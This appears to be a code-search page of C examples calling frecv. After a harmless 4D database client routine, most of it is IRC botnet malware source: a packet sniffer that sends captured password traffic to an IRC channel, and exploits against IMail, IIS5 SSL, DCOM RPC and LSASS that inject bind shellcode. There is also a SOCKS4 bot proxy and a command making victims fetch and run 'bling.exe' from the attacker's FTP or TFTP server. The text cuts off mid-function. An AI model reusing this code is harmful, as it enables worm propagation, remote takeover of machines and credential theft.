	unsigned int nbRow=state->row_count_sent;
	unsigned int r,c;
	FOURD_TYPE *colType=NULL;
	FOURD_ELEMENT *pElmt=NULL;
	char status_code=0;
	int elmt_size=0;
	int elmts_offset=0;
	Printf("---Debut de socket_receiv_data\n");
	colType=calloc(nbCol,sizeof(FOURD_TYPE));
	//bufferize Column type
	for(c=0;c<state->row_type.nbColumn;c++)
		colType[c]=state->row_type.Column[c].type;
	Printf("nbCol*nbRow:%d\n",nbCol*nbRow);
	/* allocate nbElmt in state->elmt */
	state->elmt=calloc(nbCol*nbRow,sizeof(FOURD_ELEMENT));
	
	Printf("Debut de socket_receiv_data\n");
	Printf("state->row_count:%d\t\tstate->row_count_sent:%d\n",state->row_count,state->row_count_sent);
	Printf("NbRow to read: %d\n",nbRow);
	/* read all row */
	for(r=0;r<nbRow;r++)
	{
		/* read status_code and row_id */
		if(state->updateability)  /* rowId is send only if row updateablisity */
		{
			int row_id=0;
			status_code=0;
			iResult = frecv(cnx->socket,&status_code,sizeof(status_code), 0);
			//Printf("status_code for row:0x%X\n",status_code);
			len+=iResult;
			switch(status_code)
			{
			case '0':
				break;
			case '1':
				/* pElmt->elmt=calloc(vk_sizeof(colType[0]),1); */
				iResult = frecv(cnx->socket,(char*)&row_id,sizeof(row_id), 0);
				/* Printf("row_id:%d\n",row_id); */
				len+=iResult;
				break;
			case '2':
				Printferr("Error during reading data\n");
				iResult = frecv(cnx->socket,(char*)&(state->error_code),sizeof(state->error_code), 0);
				len+=iResult;
				return 1;	/* return on error */
				break;
			default:
				Printferr("Status code 0x%X not supported in data at row %d column %d\n",status_code,(elmts_offset-c+1)/nbCol+1,c+1);
				break;
			}
		}
		else {
			Printf("Not read rowid\n");
		}
		/* read all columns */
		for(c=0;c<nbCol;c++,elmts_offset++)
		{
			pElmt=&(state->elmt[elmts_offset]);
			pElmt->type=colType[c];

			//read column status code
			status_code=0;
			iResult = frecv(cnx->socket,&status_code,1, 0);
			Printf("status: %2X\n",status_code);
			len+=iResult;
			switch(status_code)
			{
			case '2'://error
				Printferr("Error during reading data\n");
				iResult = frecv(cnx->socket,(char*)&(state->error_code),sizeof(state->error_code), 0);
				len+=iResult;
				return 1;//on sort en erreur
				break;
			case '0'://null value
				Printf("Read null value\n");
				pElmt->null=1;
				break;
			case '1'://value
				pElmt->null=0;
				switch(colType[c])
				{
				case VK_BOOLEAN:
				case VK_BYTE:
				case VK_WORD:
				case VK_LONG:
				case VK_LONG8:
				case VK_REAL:
				case VK_DURATION:
					pElmt->pValue=calloc(1,vk_sizeof(colType[c]));
					iResult = frecv(cnx->socket,(pElmt->pValue),vk_sizeof(colType[c]), 0);
					len+=iResult;
					//Printf("Long: %d\n",*((int*)pElmt->pValue));
					break;
				case VK_TIMESTAMP:
					{
						FOURD_TIMESTAMP *tmp;
						tmp=calloc(1,sizeof(FOURD_TIMESTAMP));
						pElmt->pValue=tmp;
						iResult = frecv(cnx->socket,(char*)&(tmp->year),sizeof(short), 0);
						Printf("year: %04X",tmp->year);
						len+=iResult;
						iResult = frecv(cnx->socket,&(tmp->mounth),sizeof(char), 0);
						Printf("    mounth: %02X",tmp->mounth);
						len+=iResult;
						iResult = frecv(cnx->socket,&(tmp->day),sizeof(char), 0);
						Printf("    day: %02X",tmp->day);
						len+=iResult;
						iResult = frecv(cnx->socket,(char*)&(tmp->milli),sizeof(unsigned int), 0);
						Printf("    milli: %08X\n",tmp->milli);
						len+=iResult;
					}
					break;
				case VK_FLOAT:
					{
						//int exp;char sign;int data_length;void* data;
						FOURD_FLOAT *tmp;
						tmp=calloc(1,sizeof(FOURD_FLOAT));
						pElmt->pValue=tmp;

						iResult = frecv(cnx->socket,(char*)&(tmp->exp),sizeof(int), 0);
						len+=iResult;
						iResult = frecv(cnx->socket,&(tmp->sign),sizeof(char), 0);
						len+=iResult;
						iResult = frecv(cnx->socket,(char*)&(tmp->data_length),sizeof(int), 0);
						len+=iResult;
						iResult = frecv(cnx->socket,(tmp->data),tmp->data_length, 0);
						len+=iResult;

						Printferr("Float not supported\n");
					}
					break;
				case VK_STRING:
					{
						int data_length=0;
						FOURD_STRING *str;
						//read negative value of length of string
						str=calloc(1,sizeof(FOURD_STRING));
						pElmt->pValue=str;					
						iResult = frecv(cnx->socket,(char*)&data_length,4, 0);
						len+=iResult;
						Printf("String length: %08X\n",data_length);
						data_length=-data_length;
						str->length=data_length;
						str->data=calloc(data_length*2+2,1);
						if(data_length==0){	//correct read for empty string  
							str->data[0]=0;
							str->data[1]=0;
						}
						else {
							iResult = frecv(cnx->socket,(str->data),(data_length*2), 0);
							str->data[data_length*2]=0;
							str->data[data_length*2+1]=0;
							len+=iResult;
						}
						/*
						{
							int length=0;
							char *chaine=NULL;
							chaine=base64_encode((unsigned char*)str->data,data_length*2,&length);
							Printf("Chaine: %s\n",chaine);
							free(chaine);
						}*/
					}
					break;
				case VK_IMAGE:
					//Printferr("Image-Type not supported\n");
					//break;
				case VK_BLOB:
					{
						int data_length=0;
						FOURD_BLOB *blob;
						//read negative value of length of string
						blob=calloc(1,sizeof(FOURD_BLOB));
						pElmt->pValue=blob;
						iResult = frecv(cnx->socket,(char*)&data_length,4, 0);
						Printf("Blob length: %08X\n",data_length);
						len+=iResult;
						if(data_length==0){
							blob->length=0;
							blob->data=NULL;
							pElmt->null=1;
						}else{
							blob->length=data_length;
							blob->data=calloc(data_length,1);
							iResult = frecv(cnx->socket,blob->data,data_length, 0);
							len+=iResult;
						}
						//Printf("Blob: %d Bytes\n",data_length);
					}
					//Printferr("Blob not supported\n");
					break;
				default:
					Printferr("Type not supported (%s) at row %d column %d\n",stringFromType(colType[c]),(elmts_offset-c+1)/nbCol+1,c+1);
					break;
				}
				break;
			default:
				Printferr("Status code 0x%X not supported in data at row %d column %d\n",status_code,(elmts_offset-c+1)/nbCol+1,c+1);
				break;
			}
		}
	}
	Printf("---Fin de socket_receiv_data\n");
	return 0;
}
Пример #24
0
DWORD WINAPI SniffThread(LPVOID param) {

	char sendbuf[IRCLINE], rawdata[65535], *Packet;
	int i;
	DWORD dwRet, dwMode = 1;

	PSNIFF sniff = *((PSNIFF *)param);
	PSNIFF *sniffs = (PSNIFF *)param;
	sniffs->gotinfo = TRUE;

	IPHEADER *ip;
	TCPHEADER *tcp;
	IN_ADDR sia, dia;

	SOCKET sniffsock;
	SOCKADDR_IN ssin;
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET;
	ssin.sin_port = fhtons(0);
	ssin.sin_addr.s_addr = finet_addr(GetIP(sniff.sock));

	if ((sniffsock = fsocket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {
		sprintf(sendbuf, "[PSNIFF]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
		if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
		addlog(sendbuf);

		clearthread(sniff.threadnum);

		ExitThread(0);
	}
	threads[sniff.threadnum].sock = sniffsock;

	if (fbind(sniffsock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
		sprintf(sendbuf, "[PSNIFF]: Error: bind() failed, returned: <%d>.", fWSAGetLastError());
		if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
		addlog(sendbuf);

		fclosesocket(sniffsock);
		clearthread(sniff.threadnum);

		ExitThread(0);
	}

	if (fWSAIoctl(sniffsock, SIO_RCVALL, &dwMode, sizeof(dwMode), NULL, 0, &dwRet, NULL, NULL) == SOCKET_ERROR) {
		sprintf(sendbuf, "[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.", fWSAGetLastError());
		if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
		addlog(sendbuf);

		fclosesocket(sniffsock);
		clearthread(sniff.threadnum);

		ExitThread(0);
	}

	while(1) {
		memset(rawdata, 0, sizeof(rawdata));
		Packet = (char *)rawdata;

		if (frecv(sniffsock, Packet, sizeof(rawdata), 0) == SOCKET_ERROR) {
            _snprintf(sendbuf,sizeof(sendbuf),"[PSNIFF]: Error: recv() failed, returned: <%d>", fWSAGetLastError());
			if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
			addlog(sendbuf);

            break;
        }

		ip = (IPHEADER *)Packet;
		if (ip->proto == 6) {
			Packet += sizeof(*ip);
			tcp = (TCPHEADER *)Packet;

			sia.S_un.S_addr = ip->sourceIP;
			dia.S_un.S_addr = ip->destIP;

			if (tcp->flags == 24) {
				Packet += sizeof(*tcp);
				if (strstr(Packet, "[PSNIFF]") == NULL) {
					for (i=0;i < sizeof(pswords) / sizeof(PSWORDS);i++) {
						if (strstr(Packet, pswords[i].text)) {
							_snprintf(sendbuf, sizeof(sendbuf), "[PSNIFF]: Suspicious %s packet from: %s:%d to: %s:%d - %s", 
								ptype[pswords[i].type], finet_ntoa(sia), fntohs(tcp->sport), finet_ntoa(dia), fntohs(tcp->dport), Packet);
							if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice, TRUE);
							printf("%s\n",sendbuf);
							addlog(sendbuf);

							break;
						}
					}
				}
			}
		}
	}
	fclosesocket(sniffsock);
	clearthread(sniff.threadnum);

	ExitThread(0);
}
Пример #25
0
BOOL iMail( char *target, void* conn,EXINFO exinfo )
{
	IRC* irc=(IRC*)conn;
	char szBanner[512];//, szShellcode[512];
	int iRemoteTarget;
	int ibindsize=405;
	SOCKET sSocket;

if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Beginning attack on %s",exinfo.ip);Sleep(1500);

	SOCKADDR_IN sinSockAddrIn;
	memset(&sinSockAddrIn, 0, sizeof(sinSockAddrIn));

	sinSockAddrIn.sin_family		= AF_INET;
	sinSockAddrIn.sin_addr.s_addr	= finet_addr(exinfo.ip);
	sinSockAddrIn.sin_port			= fhtons(exinfo.port);

if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Initializing IP and port for %s:%d",exinfo.ip,exinfo.port);Sleep(1500);

	if(!(sSocket = fWSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, NULL, NULL)))
		return FALSE;

if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Creating Socket for %s",exinfo.ip);Sleep(1500);

	if(fconnect(sSocket, (LPSOCKADDR)&sinSockAddrIn, sizeof(sinSockAddrIn)) == SOCKET_ERROR)
		return FALSE;

if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Connecting to socket for %s",exinfo.ip);Sleep(1500);

	if(frecv(sSocket, szBanner, sizeof(szBanner), 0) == SOCKET_ERROR)
		return FALSE;

if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Getting Banner for %s",exinfo.ip);Sleep(1500);

	if (strstr(szBanner,"IMail 7.04"))
		iRemoteTarget = 0;
	else if (strstr(szBanner,"IMail 7.05"))
		iRemoteTarget = 1;
	else if (strstr(szBanner,"IMail 7.06"))
		iRemoteTarget = 2;
	else if (strstr(szBanner,"IMail 7.07"))
		iRemoteTarget = 2;
	else if (strstr(szBanner,"IMail 7.10"))
		iRemoteTarget = 3;
	else if (strstr(szBanner,"IMail 7.11"))
		iRemoteTarget = 4;
	else if (strstr(szBanner,"IMail 7.12"))
		iRemoteTarget = 5;
	else if (strstr(szBanner,"IMail 7.13"))
		iRemoteTarget = 6;
	else if (strstr(szBanner,"IMail 7.14"))
		iRemoteTarget = 6;
	else if (strstr(szBanner,"IMail 7.15"))
		iRemoteTarget = 6;
	else if (strstr(szBanner,"IMail 8.00"))
		iRemoteTarget = 7;
	else if (strstr(szBanner,"IMail 8.01"))
		iRemoteTarget = 7;
	else if (strstr(szBanner,"IMail 8.02"))
		iRemoteTarget = 7;
	else if (strstr(szBanner,"IMail 8.03"))
		iRemoteTarget = 7;
	else if (strstr(szBanner,"IMail 8.04"))
		iRemoteTarget = 8;
	else if (strstr(szBanner,"IMail 8.05"))
		iRemoteTarget = 9;
	else if (strstr(szBanner,"IMail 8.10"))
		iRemoteTarget = 10;
	else if (strstr(szBanner,"IMail 8.11"))
		iRemoteTarget = 12;
	else if (strstr(szBanner,"IMail 8.12"))
		iRemoteTarget = 13;
	else if (strstr(szBanner,"IMail 8.13"))
		iRemoteTarget = 14;
	else if (strstr(szBanner,"IMail 8.14"))
		iRemoteTarget = 14;
	else if (strstr(szBanner,"IMail 8.15"))
		iRemoteTarget = 15;
	else
		iRemoteTarget = -1;

if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Banner for %s is %s, iRemoteTarget is %d",exinfo.ip,szBanner,iRemoteTarget);Sleep(1500);

	memcpy(szImailPacket + 12, bindshell, ibindsize -1);

	if (iRemoteTarget == -1) return FALSE;
	if (pImailTargets[iRemoteTarget].iSEHAddress == 0) 
		memcpy(szImailPacket + 700, &pImailTargets[iRemoteTarget].lOffset, 4);
	else 
		if (pImailTargets[iRemoteTarget].iSEHAddress == 1)
			memcpy(szImailPacket + 692, &pImailTargets[iRemoteTarget].lOffset, 4);

if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Crafting Malicious Packet for %s",exinfo.ip);Sleep(1500);

	if(fsend(sSocket, szImailPacket, sizeof(szImailPacket), 0) == SOCKET_ERROR)
		return FALSE;

if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Malicious packet for %s sent",exinfo.ip);Sleep(1500);

	fclosesocket(sSocket);

if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Socket Closed for %s",exinfo.ip);Sleep(1500);
	
	if (ConnectShell(exinfo,bindport))
	{
		if (!exinfo.silent)
			irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
		exploit[exinfo.exploit].stats++;
	} else
		if (!exinfo.silent && exinfo.verbose)
			irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
		return FALSE;
}
Пример #26
0
BOOL IIS5SSL(EXINFO exinfo)
{
	char buffer[IRCLINE];
	char request[]="\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";

	unsigned long XOR=0xffffffff;
	unsigned long offsets[] = {	
		0x6741a1cd,		// Win2K SP0
		0x6741a199,		// Win2K SP1
		0x6741a426,		// Win2K SP2
		0x67419e1d,		// Win2K SP3
		0x67419ce8,		// Win2K SP4
		0x0ffb7de9,		// WinXP SP0
		0x0ffb832f		// WinXP SP1
	};

	BOOL bRet = FALSE;

	unsigned char *badbuffer=(unsigned char*)malloc(347); 
	memset(badbuffer, 0, 347);
	unsigned char *p=badbuffer; 
	memcpy(p, request, sizeof(request));
	p+=sizeof(request)-1; 
	strcat((char*)p, jumper);
	strcat((char*)p, bind_shell_code);

	SOCKET sSock;
	if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
		SOCKADDR_IN ssin;

		// FIX ME: since i didnt found a way to determine the remote OS, i
		//		   placed this all together in a loop. this aint the best way
		//		   i'm sure about that
		for (int i=0; i < (sizeof(offsets) / sizeof(LPTSTR)); i++) {
			memset(&ssin, 0, sizeof(ssin));
			ssin.sin_family = AF_INET;
			ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
			ssin.sin_port = fhtons(exinfo.port);

			if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
				offsets[i]^=XOR; 
				strncat((char*)p, (char*)&offsets[i], 4);
				strcat((char*)p, shellcode);

				if (fsend(sSock, (char *)&badbuffer, strlen((char *)&badbuffer), 0)) { 
					Sleep(1000); 
					fclosesocket(sSock);
			
					memset(&ssin, 0, sizeof(ssin));
					ssin.sin_family = AF_INET;
					ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
					ssin.sin_port = fhtons(1981);

					if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin))) {
						char cmd_buff[400];

						#ifndef NO_TFTPD
						_snprintf(cmd_buff, sizeof (cmd_buff),
							"tftp -i %s get %s\r\n",
							GetIP(exinfo.sock),filename, filename);	
						#endif
						#ifndef NO_FTPD
						_snprintf(cmd_buff, sizeof (cmd_buff),
							"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
							GetIP(exinfo.sock),FTP_PORT);	
						#endif
							
						if(frecv(exinfo.sock, buffer, sizeof(buffer), 0) > 0) {
							Sleep(500);

							if(fsend(sSock,(char*)cmd_buff, strlen(cmd_buff),0) > 0) {
								fclosesocket(sSock);

								bRet = TRUE;
								_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
								if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
								addlog(buffer);

								break;
							}
						}
					}
				}
			}
			fclosesocket(sSock);
		}
	}

	return (bRet);
}
Пример #27
0
DWORD WINAPI Socks4ClientThread(LPVOID param)
{
	SOCKS4 socks4 = *((SOCKS4 *)param);
	SOCKS4 *socks4p = (SOCKS4 *)param;
	socks4p->cgotinfo = TRUE;

	int threadnum = socks4.cthreadnum;

	SOCKS4HEADER hdr;

	TIMEVAL timeout;
	timeout.tv_sec = 5;
	timeout.tv_usec = 0;
	fd_set fd;
	FD_ZERO(&fd);
	FD_SET(threads[threadnum].sock, &fd);

	if (fselect(0, &fd, NULL, NULL, &timeout) == 0) {
		fclosesocket(threads[threadnum].sock);
		clearthread(threadnum);
		ExitThread(0);
	}
	if (frecv(threads[threadnum].sock, (char *)&hdr, sizeof(hdr), 0) <= 0) {
		fclosesocket(threads[threadnum].sock);
		clearthread(threadnum);		
		ExitThread(0);
	}
	if (hdr.vn != 4 || hdr.cd != SOCKS4_CONNECT) {
		fclosesocket(threads[threadnum].sock);
		clearthread(threadnum);
		ExitThread(0);
	}

	// FIX ME: do a userid (hdr.userid) check here if you wish to use simple auth (needs testing)
	if (socks4.userid[0] != '\0') {
		if (strcmp(hdr.userid, socks4.userid) != 0) {
			addlogv("[SOCKS4]: Authentication failed. Remote userid: %s != %s.", hdr.userid, socks4.userid);
	
			hdr.vn = 0;
			hdr.cd = SOCKS4_REJECT_USERID;
			memset(&hdr.userid, 0, 1024);
			fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);

			fclosesocket(threads[threadnum].sock);
			clearthread(threadnum);

			ExitThread(0);
		}
	}

	SOCKADDR_IN tsin;
	memset(&tsin, 0, sizeof(tsin));
	tsin.sin_family = AF_INET;
	tsin.sin_port = hdr.destport;
	tsin.sin_addr.s_addr = hdr.destaddr;

	SOCKET tsock;
	if ((tsock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
		addlogv("[SOCKS4]: Error: Failed to open socket(), returned: <%d>.", fWSAGetLastError());

		hdr.vn = 0;
		hdr.cd = SOCKS4_REJECT;
		memset(&hdr.userid, 0, 1024);
		fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);

		fclosesocket(threads[threadnum].sock);
		clearthread(threadnum);
	
		ExitThread(0);
	}

	if (fconnect(tsock, (LPSOCKADDR)&tsin, sizeof(tsin)) == SOCKET_ERROR) {
		addlogv("[SOCKS4]: Error: Failed to connect to target, returned: <%d>.", fWSAGetLastError());

		hdr.vn = 0;
		hdr.cd = SOCKS4_REJECT;
		memset(&hdr.userid, 0, 1024);
		fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);

		fclosesocket(threads[threadnum].sock);
		clearthread(threadnum);

		ExitThread(0);
	}

	hdr.vn = 0;
	hdr.cd = SOCKS4_GRANT;
	memset(&hdr.userid, 0, 1024);
	fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
	TransferLoop(tsock, threads[threadnum].sock);

	fclosesocket(tsock);
	fclosesocket(threads[threadnum].sock);
	clearthread(threadnum);

	ExitThread(0);
}
Пример #28
0
BOOL dcom(EXINFO exinfo)
{
	char sendbuf[IRCLINE];

	if (exinfo.port == 445) {
		NETRESOURCEW nr;

		if (!ConnectViaNullSession(exinfo.ip, &nr)) 
			return FALSE;
		else {
			char szPipePath[MAX_PATH];
			sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", exinfo.ip);
			HANDLE hFile = CreateFile(szPipePath, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

			if (hFile == INVALID_HANDLE_VALUE) {
				CloseNullSession(exinfo.ip);
				return FALSE;
			}

			// sprintf(sendbuf, "[dcom]: Connected to pipe \\\\%s\\pipe\\epmapper", exinfo.ip);
			// irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);

			int TargetOS = FpHost(exinfo.ip, FP_PORT5K);

			// get shellcode
			DWORD reqbufsize;
			char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, TRUE);
			if (!reqbuf) {
				CloseHandle(hFile);
				CloseNullSession(exinfo.ip);
				return FALSE;
			}

			unsigned long lWritten;
			char *szInBuf = (char *)malloc(100000);
			memset(szInBuf, 0, 100000);

			// send the bind string
			DWORD dwRead;
			TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL);
			if (szInBuf[2] != 0x0C) {
				free(szInBuf); 
				free(reqbuf);
				CloseHandle(hFile);
				CloseNullSession(exinfo.ip);
				return FALSE;
			}

			// send the evil request
			if (!WriteFile(hFile, reqbuf, reqbufsize, &lWritten, 0)) {
				free(szInBuf); 
				free(reqbuf);
				CloseHandle(hFile);
				CloseNullSession(exinfo.ip);
				return FALSE;
			}

			BOOL Result = ReadFile(hFile, szInBuf, 10000, &dwRead, NULL);

			free(reqbuf); 
			free(szInBuf);
			CloseHandle(hFile);
			CloseNullSession(exinfo.ip);

			if (Result == TRUE) {
				return FALSE;
			}
		}

	} else { // port 135 and others

		int TargetOS = FpHost(exinfo.ip, FP_RPC);
		if (TargetOS == OS_WINNT) 
			return FALSE;

		// get a funky fresh socket
		SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP);
		if (sSocket == SOCKET_ERROR) 
			return FALSE;

		// fill in sockaddr and resolve the host
		SOCKADDR_IN ssin; 
		memset(&ssin, 0, sizeof(ssin));
		ssin.sin_family = AF_INET;
		ssin.sin_port = fhtons((unsigned short)exinfo.port);
		ssin.sin_addr.s_addr = finet_addr(exinfo.ip);

		// get shellcode
		DWORD reqbufsize;
		char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, FALSE);
		if (!reqbuf) {
			fclosesocket(sSocket);
			return FALSE;
		}

		// connect to the server
		int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin));
		if (iErr == -1) { // connect failed, exit
			free(reqbuf);
			fclosesocket(sSocket);
			return FALSE;
		}

		// send the bind string
		if (fsend(sSocket, bindstr, sizeof(bindstr)-1, 0) == SOCKET_ERROR) {
			free(reqbuf);
			fclosesocket(sSocket);
			return FALSE;
		}

		// read reply
		char recvbuf[4096];
		frecv(sSocket, recvbuf, 4096, 0);
		// Send the evil request
		if (fsend(sSocket, reqbuf, reqbufsize, 0) == SOCKET_ERROR) {
			free(reqbuf);
			fclosesocket(sSocket);
			return FALSE;
		}

		// read reply
		if (frecv(sSocket, recvbuf, 4096, 0) == SOCKET_ERROR) {
			free(reqbuf);
			fclosesocket(sSocket);
			return FALSE;
		}

		free(reqbuf);
		// Close the socket
		fclosesocket(sSocket);		
	}

	sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip);
	for (int i=0; i < 6; i++) {
		if (searchlog(sendbuf)) {
			sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
			if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
			addlog(sendbuf);
			exploit[exinfo.exploit].stats++;

			break;
		}
		Sleep(5000);
	}

	return TRUE;
}
Пример #29
0
BOOL lsass2(EXINFO exinfo)
{
	int i, targetx, len, targetxOS;

	char hostipc[40];
	char hostipc2[40*2];
	char buf[LEN+1];
	char sendbuf[(LEN+1)*2];
	char req4u[sizeof(reqx4)+20];
	char screq[BUFSIZE+sizeof(reqx7)+1500+440];
	char screq2k[4348+4060];
	char screq2k2[4348+4060];
	char recvbuf[1600];
	char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4";
	char strBuffer[BUFSIZE];

	char buffer[IRCLINE], cmd_buff[400];

	char smblen;
	char unclen;

	unsigned short port;

	SOCKET sSocket, bSocket;
	SOCKADDR_IN ssin, bsin;

	targetxOS = FpHost(exinfo.ip, FP_RPC);
	if ((targetxOS == OS_UNKNOWN) || (targetxOS == OS_WINNT))
		return FALSE;

	if (targetxOS == OS_WINXP)
		targetx = 0;
	else if (rand() % 10)
		targetx = 1;
	else
		targetx = 2;

	_snprintf(hostipc, sizeof(hostipc),"\\\\%s\\ipc$", exinfo.ip);

	for (i=0; i<40; i++) {
		hostipc2[i*2] = hostipc[i];
		hostipc2[i*2+1] = 0;
	}

	memcpy(req4u, reqx4, sizeof(reqx4)-1);
	memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
	memcpy(req4u+47+strlen(hostipc)*2, reqx4+87, 9);

	smblen = 52+(char)strlen(hostipc)*2;
	memcpy(req4u+3, &smblen, 1);

	unclen = 9 + (char)strlen(hostipc)*2;
	memcpy(req4u+45, &unclen, 1);

	port = fhtons(LSASS_BSPORT)^(USHORT)0x9999;
	memcpy(&bindshell[176], &port, 2);

	if ((targetx == 1) || (targetx == 2)) {
		memset(buf, NOP, LEN);

		//memcpy(&buf[2020], "\x3c\x12\x15\x75", 4);
		memcpy(&buf[2020], &ttargetx[targetx].jmpaddr, 4);
		memcpy(&buf[2036], &bindshell, strlen(bindshell));

		memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
		memcpy(&buf[2844], &ttargetx[targetx].jmpaddr, 4); // jmp ebx addr
		//memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr

		memcpy(&buf[2856], &bindshell, strlen(bindshell));

		for (i=0; i<LEN; i++) {
			sendbuf[i*2] = buf[i];
			sendbuf[i*2+1] = 0;
		}
		sendbuf[LEN*2]=0;
		sendbuf[LEN*2+1]=0;

		memset(screq2k, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
		memset(screq2k2, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);

	} else {
		memset(strBuffer, NOP, BUFSIZE);
		memcpy(strBuffer+160, bindshell, strlen(bindshell));
		memcpy(strBuffer+1980, strasm, strlen(strasm));
		*(long *)&strBuffer[1964]=ttargetx[targetx].jmpaddr;
	}

	memset(screq, 0x31, BUFSIZE+sizeof(reqx7)+1500);

	if ((sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP)) == SOCKET_ERROR)
		return FALSE;

	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET;
	ssin.sin_port = fhtons((unsigned short)exinfo.port);
	ssin.sin_addr.s_addr = finet_addr(exinfo.ip);

	if (fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) {
		fclosesocket(sSocket);
		return FALSE;
	}

	if (fsend(sSocket, reqx1, sizeof(reqx1)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, reqx2, sizeof(reqx2)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, reqx3, sizeof(reqx3)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, req4u, smblen+4, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, reqx5, sizeof(reqx5)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if (fsend(sSocket, reqx6, sizeof(reqx6)-1, 0) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}
	len = frecv(sSocket, recvbuf, 1600, 0);

	if ((targetx == 1) || (targetx == 2)) {
		memcpy(screq2k, reqx8, sizeof(reqx8)-1);
		memcpy(screq2k+sizeof(reqx8)-1, sendbuf, (LEN+1)*2);

		memcpy(screq2k2, reqx9, sizeof(reqx9)-1);
		memcpy(screq2k2+sizeof(reqx9)-1, sendbuf+4348-sizeof(reqx8)+1, (LEN+1)*2-4348);

		memcpy(screq2k2+sizeof(reqx9)-1+(LEN+1)*2-4348-sizeof(reqx8)+1+206, shitx3, sizeof(shitx3)-1);

		if (fsend(sSocket, screq2k, 4348, 0) == SOCKET_ERROR) {
			fclosesocket(sSocket);
			return FALSE;
		}
		len = frecv(sSocket, recvbuf, 1600, 0);

		if (fsend(sSocket, screq2k2, 4060, 0) == SOCKET_ERROR) {
			fclosesocket(sSocket);
			return FALSE;
		}

	} else {
		memcpy(screq, reqx7, sizeof(reqx7)-1);
		memcpy(screq+sizeof(reqx7)-1, &strBuffer[0], BUFSIZE);
		memcpy(screq+sizeof(reqx7)-1+BUFSIZE, shitx1, 9*16);

		screq[BUFSIZE+sizeof(reqx7)-1+1500-304-1] = 0;
		if (fsend(sSocket, screq, BUFSIZE+sizeof(reqx7)-1+1500-304, 0) == SOCKET_ERROR) {
			fclosesocket(sSocket);
